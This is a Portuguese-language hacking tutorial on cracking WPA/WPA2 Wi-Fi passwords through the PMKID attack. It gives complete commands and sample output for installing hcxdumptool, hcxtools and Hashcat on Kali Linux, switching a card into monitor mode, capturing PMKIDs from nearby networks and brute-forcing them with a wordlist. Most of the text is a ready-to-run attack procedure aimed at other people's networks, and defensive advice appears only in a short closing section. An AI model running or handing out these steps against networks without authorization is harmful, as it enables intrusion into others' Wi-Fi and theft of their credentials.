O mais recente ataque contra o PMKID usa o Hashcat para quebrar senhas WPA e permite que hackers encontrem redes com senhas fracas com mais facilidade.
A maneira antiga de quebrar senhas WPA2
A maneira antiga de quebrar o WPA2 já existe há algum tempo e envolve desconectar momentaneamente um dispositivo conectado do ponto de acesso que queremos tentar quebrar. Isso tem duas desvantagens, que são essenciais para os hackers de Wi-Fi entenderem.
A primeira desvantagem é a exigência de que alguém esteja conectado à rede para atacá-la. A senha da rede pode ser fraca e muito fácil de quebrar, mas sem um dispositivo conectado para iniciar brevemente, não há oportunidade de capturar um handshake, portanto, não há chance de tentar decifrá-lo.
A segunda desvantagem dessa tática é que ela é barulhenta e legalmente problemática, pois força você a enviar pacotes que desconectam deliberadamente um usuário autorizado de um serviço que eles estão pagando para usar. Esse tipo de interferência não autorizada é tecnicamente um ataque de negação de serviço e, se mantido, é equivalente a bloquear uma rede. Isso pode causar problemas e é facilmente detectável por alguns de nossos guias anteriores.
Um novo método de quebra de senha
Em vez de depender da interceptação de comunicações bidirecionais entre dispositivos Wi-Fi para tentar decifrar a senha, um invasor pode se comunicar diretamente com um ponto de acesso vulnerável usando o novo método. Em 4 de agosto de 2018, uma postagem no fórum Hashcat detalhou uma nova técnica que alavanca um ataque contra o RSN IE (Robust Security Network Information Element) de um único quadro EAPOL para capturar as informações necessárias para tentar um ataque de força bruta.
Semelhante aos ataques anteriores contra WPA, o invasor deve estar próximo à rede que deseja atacar. O objetivo será usar um adaptador de rede sem fio compatível com Kali para capturar as informações necessárias da rede para tentar forçar a senha. Em vez de usar Aireplay-ng ou Aircrack-ng, usaremos uma nova ferramenta de ataque sem fio para fazer isso chamada hcxtools.
Usando Hcxtools e Hashcat
Hcxdumptool e hcxpcaptool são ferramentas escritas para auditoria de Wi-Fi e testes de penetração, e nos permitem interagir com redes Wi-Fi próximas para capturar handshakes WPA e hashes PMKID. Ele funciona de maneira semelhante ao Besside-ng , pois requer argumentos mínimos para iniciar um ataque a partir da linha de comando, pode ser executado contra alvos específicos ou alvos de conveniência e pode ser executado rapidamente por SSH em um Raspberry Pi ou outro dispositivo sem um tela.
Uma vez que o PMKID é capturado, o próximo passo é carregar o hash no Hashcat e tentar quebrar a senha. É aqui que o hcxtools difere do Besside-ng, pois uma etapa de conversão é necessária para preparar o arquivo para o Hashcat. Usaremos hcxpcaptool para converter nosso arquivo PCAPNG em um Hashcat com o qual possa trabalhar, deixando apenas a etapa de selecionar uma lista robusta de senhas para suas tentativas de força bruta.
Vale ressaltar que nem toda rede é vulnerável a esse ataque. Como este é um campo opcional adicionado por alguns fabricantes, você não deve esperar sucesso universal com essa técnica. Se você pode capturar o PMKID depende se o fabricante do ponto de acesso fez o favor de incluir um elemento que o inclua, e se você pode quebrar o PMKID capturado depende se a senha subjacente está contida em sua lista de senhas de força bruta . Se uma das condições não for atendida, esse ataque falhará.
O que você vai precisa
Para tentar esse ataque, você precisará estar executando o sistema operacional Kali Linux e ter acesso a um adaptador de rede sem fio que suporte o modo monitor e a injeção de pacotes.
Além de um adaptador de rede compatível com Kali (recomendamos o Chipset Atheros AR9271 ou TP-Link TL-WN722N v1 encontrado facilmente na Internet ou em qualquer loja especializada em tecnologia) , certifique-se de ter atualizado e atualizado totalmente seu sistema. Caso contrário, alguns pacotes podem estar desatualizados e causar problemas durante a captura.
Instale Hxctools Hashcat
Primeiro, instalaremos as ferramentas de que precisamos. Para baixá-los, digite o seguinte em uma janela de terminal.
~# git clone https://github.com/ZerBea/hcxdumptool.git
Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.
Em seguida, mude para o diretório e finalize a instalação com make e depois make install.
~# cd hcxdumptool
~/hcxdumptool# make
cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
~/hcxdumptool# make install
cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~
Quando terminar de instalar, passaremos para a instalação do hxctools. Para fazer isso, abra uma nova janela de terminal ou saia do diretório /hexdumptool e instale o hxctools.
~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git
Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.
Em seguida, mude para seu diretório e execute make e make install como antes. Se você receber um erro, tente digitar sudo antes do comando.
~# cd hcxtools
~/hcxtools# make
mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c
~/hcxtools# make install
install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk
Por fim, precisaremos instalar o Hashcat, o que deve ser fácil, pois está incluído no repositório Kali Linux por padrão. Basta digitar o seguinte para instalar a versão mais recente do Hashcat.
~/hcxtools# cd
~# apt install hashcat
Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.
Com isso concluído, podemos passar para a configuração do adaptador de rede sem fio.
Prepare o adaptador de rede sem fio
Depois de conectar seu adaptador de rede sem fio compatível com Kali, você pode encontrar o nome digitando ifconfig ou ip a . Normalmente, será nomeado algo como wlan0. O primeiro passo será colocar o cartão no modo de monitor sem fio, permitindo ouvir o tráfego Wi-Fi na área imediata.
Para fazer isso, digite o seguinte comando em uma janela de terminal, substituindo o nome do seu adaptador de rede sem fio por wlan0.
~# airmon-ng start wlan0
Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
555 NetworkManager
611 wpa_supplicant
6636 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
Agora, seu adaptador de rede sem fio deve ter um nome como "wlan0mon" e estar no modo monitor. Você pode confirmar isso executando ifconfig novamente.
Use Hxcdump para capturar PMKIDs de redes locais
Agora estamos prontos para capturar os PMKIDs dos dispositivos que queremos tentar atacar. Com nosso adaptador de rede sem fio no modo monitor como "wlan1mon", executaremos o seguinte comando para iniciar o ataque.
~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1
Resumindo, -i informa ao programa qual interface estamos usando, neste caso, wlan1mon. O nome do arquivo no qual salvaremos os resultados pode ser especificado com o argumento -o flag. O canal em que queremos varrer pode ser indicado com o sinalizador -c seguido do número do canal a ser varrido.
Em nosso comando acima, estamos usando wlan1mon para salvar PMKIDs capturados em um arquivo chamado "galleria.pcapng". Embora você possa especificar outro valor de status , não obtive sucesso na captura de nenhum valor, exceto 1.
warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956
[22:17:32 - 001] c8b5adb615ea - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 - b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff - ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff - ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 - 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b - 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 - 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 - fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da - c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0
Quando você reunir o suficiente, você pode parar o programa digitando Control-C para encerrar o ataque. Isso deve produzir um arquivo PCAPNG contendo as informações necessárias para tentar um ataque de força bruta, mas precisaremos convertê-lo em um formato que o Hashcat possa entender.
Use Hxcpcaptool para converter o despejo para Hashcat
Para converter nosso arquivo PCAPNG, usaremos hcxpcaptool com alguns argumentos especificados. Na mesma pasta em que seu arquivo .PCAPNG foi salvo, execute o seguinte comando em uma janela de terminal.
~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng
Este comando está dizendo ao hxcpcaptool para usar as informações incluídas no arquivo para ajudar o Hashcat a entendê-lo com os sinalizadores -E , -I e -U . O sinalizador -Z é usado para o nome do arquivo recém-convertido para o Hashcat usar, e a última parte do comando é o arquivo PCAPNG que queremos converter.
A execução do comando deve nos mostrar o seguinte.
summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)
21 PMKID(s) written to galleriahC.16800
Aqui, podemos ver que reunimos 21 PMKIDs em um curto período de tempo. Agora podemos usar o arquivo "galleriaHC.16800" no Hashcat para tentar quebrar senhas de rede.
Selecione uma lista de senhas e força bruta com Hashcat
Para começar a atacar os hashes que capturamos, precisaremos escolher uma boa lista de senhas. Você pode encontrar várias listas de senhas boas para começar de novo na coleção SecList. Depois de ter uma lista de senhas, coloque-a na mesma pasta do arquivo .16800 que você acabou de converter e execute o seguinte comando em uma janela de terminal.
~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'
Neste comando, estamos iniciando o Hashcat no modo 16800 , que é para atacar os protocolos de rede WPA-PMKID-PBKDF2. Em seguida, especificaremos o nome do arquivo que queremos quebrar, neste caso, "galleriaHC.16800". O sinalizador -a nos informa quais tipos de ataque usar, neste caso, um ataque "direto" e, em seguida, os sinalizadores -w e --kernel-accel=1 especificam o perfil de carga de trabalho de desempenho mais alto. Se o seu computador tiver problemas de desempenho, você pode diminuir o número no argumento -w .
Em seguida, a opção --force ignora quaisquer avisos para prosseguir com o ataque, e a última parte do comando especifica a lista de senhas que estamos usando para tentar forçar os PMKIDs em nosso arquivo, neste caso, chamado "topwifipass. TXT."
hashcat (v4.2.1) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU
Hashes: 21 digests; 21 unique digests, 20 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:
* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =
Dependendo da velocidade do seu hardware e do tamanho da sua lista de senhas, isso pode levar algum tempo ou até dias para ser concluído. Para ver o status a qualquer momento, você pode pressionar a tecla S para uma atualização.
Interpretar os resultados
À medida que o Hashcat se desfaz, você poderá fazer check-in à medida que avança para ver se alguma chave foi recuperada.
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 - moneyman
HWon.Dev.#1......: N/A
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli - mercenary
HWon.Dev.#1......: N/A
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =
Quando a lista de senhas estiver chegando ao fim, o Hashcat ajustará automaticamente a carga de trabalho e fornecerá um relatório final quando estiver concluído.
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 - 00001111
HWon.Dev.#1......: N/A
Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018
Se você conseguiu quebrar alguma senha, você as verá aqui. Em nosso teste, nenhum dos PMKIDs que coletamos continha senhas em nossa lista de senhas, portanto, não conseguimos quebrar nenhum dos hashes. Este provavelmente será o seu resultado também em qualquer rede com uma senha forte, mas espere ver resultados aqui para redes usando uma senha fraca.
O ataque PMKID Hashcat torna os ataques Wi-Fi mais fáceis
Embora o novo ataque contra senhas de Wi-Fi facilite a tentativa de hackers de atacar um alvo, os mesmos métodos que foram eficazes contra tipos anteriores de cracking de WPA permanecem eficazes. Se sua rede nem mesmo suporta o elemento de segurança robusto que contém o PMKID, esse ataque não tem chance de sucesso. Você pode auditar sua própria rede com hcxtools para ver se ela é suscetível a esse ataque.
Mesmo que sua rede seja vulnerável, uma senha forte ainda é a melhor defesa contra um invasor que obtenha acesso à sua rede Wi-Fi usando este ou outro ataque de quebra de senha.
Como esses ataques se baseiam em adivinhar a senha que a rede Wi-Fi está usando, há duas fontes comuns de suposições; A primeira é que os usuários escolhem senhas padrão ou escandalosamente ruins , como "12345678" ou "senha". Estes serão facilmente quebrados. A segunda fonte de adivinhações de senha vem de violações de dados que revelam milhões de senhas reais de usuários . Como muitos usuários reutilizam senhas entre diferentes tipos de contas, essas listas tendem a ser muito eficazes para quebrar redes Wi-Fi.
Espero que esse artigo possa te ajudar Se tiver alguma dúvida sobre este tutorial sobre hacking ou tiver não deixe de postar nos comentários!